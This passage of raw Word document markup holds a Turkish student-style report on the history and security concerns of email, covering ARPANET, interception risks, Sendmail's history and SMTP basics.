        <w:t>Yaklaşık 50 yıl önce bir Ana bilgisayarda  çalışan insanlar birinin doğrudan erişim depolama aygıtı sürücüsündeki dizinine mesaj  bırakmış veya dosya yerleştirmişlerdi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bununla Birlikte ilk  elektronik mesajlaşma sistemi başlamış oldu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="88"/>
          <w:szCs w:val="88"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bir çok insan elektronik mail veya e-mail adlandırılmasını arpa net ile  başlattı</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Elektronik İletişimde  bilgi güvenliği  çalışanlar ,ticari şirketler hükümetler ve bireysel kullanıcılar için her zaman proplem olmuştur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bilgisayar Sistemleri birbiriyle Konuşmaya başladığında</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>,Bilgisayar kullanıcıları arasında iletişimde  gelişme çok hızlı bir şekilde arttı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41A29">
        <w:t>İnternet başlangıçta askeri ve üniversite kullanımı için artmıştır. Buda Güvenli tasarım ve elektronik postanın büyümesi için doğal bir   alan oluşturmuştur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bugün e-posta ,elektronik sohbet ve veri aktarımı çok hızlı bir şekilde gerçekleşmektedir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Çoklu protokol  iletişimi ağları birbirine bağlama ve işletmelerin başarılı olması için zorunludur.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Elektronik postanın bir noktadan diğerine gitmek için birden fazla platformdan ve bir çok ağ üzerinden geçmesi gerekir. Ağlar arası ve bağlantılardan her geçişte ele geçirilebilir değiştirilebilir kopyalanabilir veya tamamen durdurulabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">İnternet Bağlantısı </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Şekil-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D7293D2" wp14:editId="7F9D8B91">
            <wp:extent cx="5760720" cy="3872532"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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872532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0047640A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00C41A29">
        <w:t xml:space="preserve">İnternetteki sohbet odaları internet üzerinde  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>modifiye</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t xml:space="preserve"> edilmiş  e – posta siteleridir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Aynı anda  e-postayı  birden çok taraf okuyabilir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bu sohbet odaları kullanıcının bir mesaj göndermesini sağlar;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bu mesajı aynı anda birkaç kişi aynı anda görebilir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bu tarz iletişim bir risktir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Günümüzde e –postayı dünyadaki her hükümet ve kurum  güvenilir bir kurumsal iletişim olarak kullanmaktadır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Dahili ağlar ile  bazen çok az da olsa açık metinler taşınır  fakat kimlik doğrulaması yoktur.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>Bu kritik iş mesajları arasında  iç iletişim için  kullanılan halka açık  telefon hatları üzerinden taşınabilir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:t>.Bu trafik çoğu durumda orijinallik ve veri olarak sorgulanamaz  ve dinlenilebilir .</w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t>Mesajın orijinal yazardan geldiği bilinse de  onaylayan sertifika ve imza yok.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t>Bir  çok durumda Günümüz standartlarına göre  e-posta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t xml:space="preserve">yasal olarak kabul edilen  fiili güvenilir  bir iletişim  türü  haline gelmek  için yasal ve bağlayıcı olması durumunda üçüncü taraf orijinallik </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t>sertifikası</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t xml:space="preserve"> içermesi gerekiyor(Bir çeşit noter tasdikli olması)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t>Mesajdaki  kimliğin nasıl değiştirileceğini hızlı bir şekilde anlayan kişi   finansal  bilgileri alır .Bu durum ise daha çok meseleleri karıştırır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t>ABD ‘de bu durum da  çok dava olmuştur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0047640A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="0047640A">
        <w:t>Elektronik ortamda nerede olduğunu kanıtlamak için görev sistemi yöneticilerine dava açılmış</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="0047640A">
        <w:t>Bilgi nereden geldi ve gitti. Aslında kim  yolladı sorular  sorulmuştur. Ne zaman yollandı ve nasıl kanıtlanabilir, imkansız hale geldi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t xml:space="preserve">tüm ağları kapsayan denetim araçları bulunmadığında </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t>Uzun vadeli rapor veya denetim verilerinin saklanması.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0047640A">
        <w:t>çözüm olarak sunulmuştu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2.E-Posta Trafiğ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E posta Trafiği sesli ve görüntülü iletişim hatlarını paylaşıyor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fiber optik kablolar iletişimde en cok kullanılan  kablolardır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bakır kablolar da problemler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> olabilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sistem yöneticileri kapasite sorunlarını ve arızalarını izlemelidir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ne kadar trafik akışı olacağını ve ne zaman olacağını belirleyebilmelile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Sistem yöneticisi hakkındaki tüm soruları  cevapladıktan sonra kullanıcı sayısı ve her bir kullanıcıya  tahsis edilecek disk alanı e –postanın  depolanması için  bir sistem gereksinimi bir araya getirebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.Herhangi bir sisteme uygulanan güvenlik miktarı sistemin çalışacağı hızı ve işlevselliği etkileyeb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lastRenderedPageBreak/>
        <w:t>3.POSTA HİZMETLERİ ÇEŞİTLER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İlk mesaj  elektrik  kullanan tel ile sağlanmıştır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İlk ana bilgisayar  posta  olarak  SNA  protokollerine dayanıyor sadece ASCII formattaydı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bugün IP Tabanlı trafik var  Bir çok iletişim sistemi kullanan   bir çok ağ türü va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4.MAİL GÖNDERME:(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mail)</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Her internet  e postasının bir yerlerde gittiği yol boyunca Send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mail sunucusu tarafından işlenir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mail’in piyasaya sürülen sürümü 1997’de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eric ALLMAN ve GREG OLSON  tarafından sendmaiL’İNC  olarak geliştirildi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sendmail çoğu internet servis sağlayıcısı tarafından kullanılır ve gönderilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.Her internet  e postasının bir yerlerde gittiği yol boyunca Sendmail sunucusu tarafından işlenir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sendmail’in piyasaya sürülen sürümü 1997’de Eric ALLMAN ve GREG OLSON  tarafından SENDMAİL’İNC  olarak geliştirildi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SENDMAİL çoğu internet servis sağlayıcısı tarafından kullanılır ve gönderilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SUN ,HP,IBM ,DEC,SGI,SCO ve  diğer tüm büyük UNIX satıcılarının standart çözüm olarak sendmail kullanır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SENDMAİL uygulaması günümüz  internet işlemlerinde  çok önemlidir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SENDMAİL programı ARPA Net’e bağlıydı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ARPANET ,İNGRES,BERKNET SENDMAİL bağlanmak için  ortak bir protokol ile bireysel  e-posta programları için oluşturuldu. İlk Sendmail programı Berkeley’in 4.1c sürümüyle gönderildi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yazılım dağıtımı veya BERKELEY UNIX’in ilk sürümü TCP/IP  içeriyordu.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SENDMAİL Yazarları tarafından sürekli olarak geliştirilmişt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5.POSTA TANIM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Elektronik posta (e-posta), Internet üzerinde bilgisayarlar ve insanlar arasında bilgi alışverişini sağlayan ve en yaygın kullanılan Internet uygulamasıdır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Birinin  e-posta yoluyla elektronik bir mesaj alması İnternet üzerinde TCP/IP  bir parçası olan  SMTP  transfer protokolü kullanılmaktadı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SMPT protokolü sayesinde farklı işletim sistemine sahip bilgisayarlar arasında e posta alışverişi gerçekleşmektedi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E-posta istemci/sunucu prensibi ile çalışmaktadır. Mail okumak ve göndermek için kullanıcılar maillerinin geldiği ve gönderildiği bilgisayara, yani sunucuya erişmelidir. istemci uygulaması kullanıcının mail okumasını, maile cevap göndermesini, maili yönlendirmesini, mail yazmasını ve mail göndermesini sağlayan arayüzdür.E –Posta  Adresi Nedir-posta adresi (mektuplarda olduğu gibi) mektubun gideceği adrestir. çoğunlukla, kişinin kullanıcı adı ve kullandığı sistemin internet adresinden oluşur. Aşağıda e-posta adres  örnekleri verilmiştir. </w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidRPr="00E332D5">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>pinar@atlas.cc.itu.edu.tr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
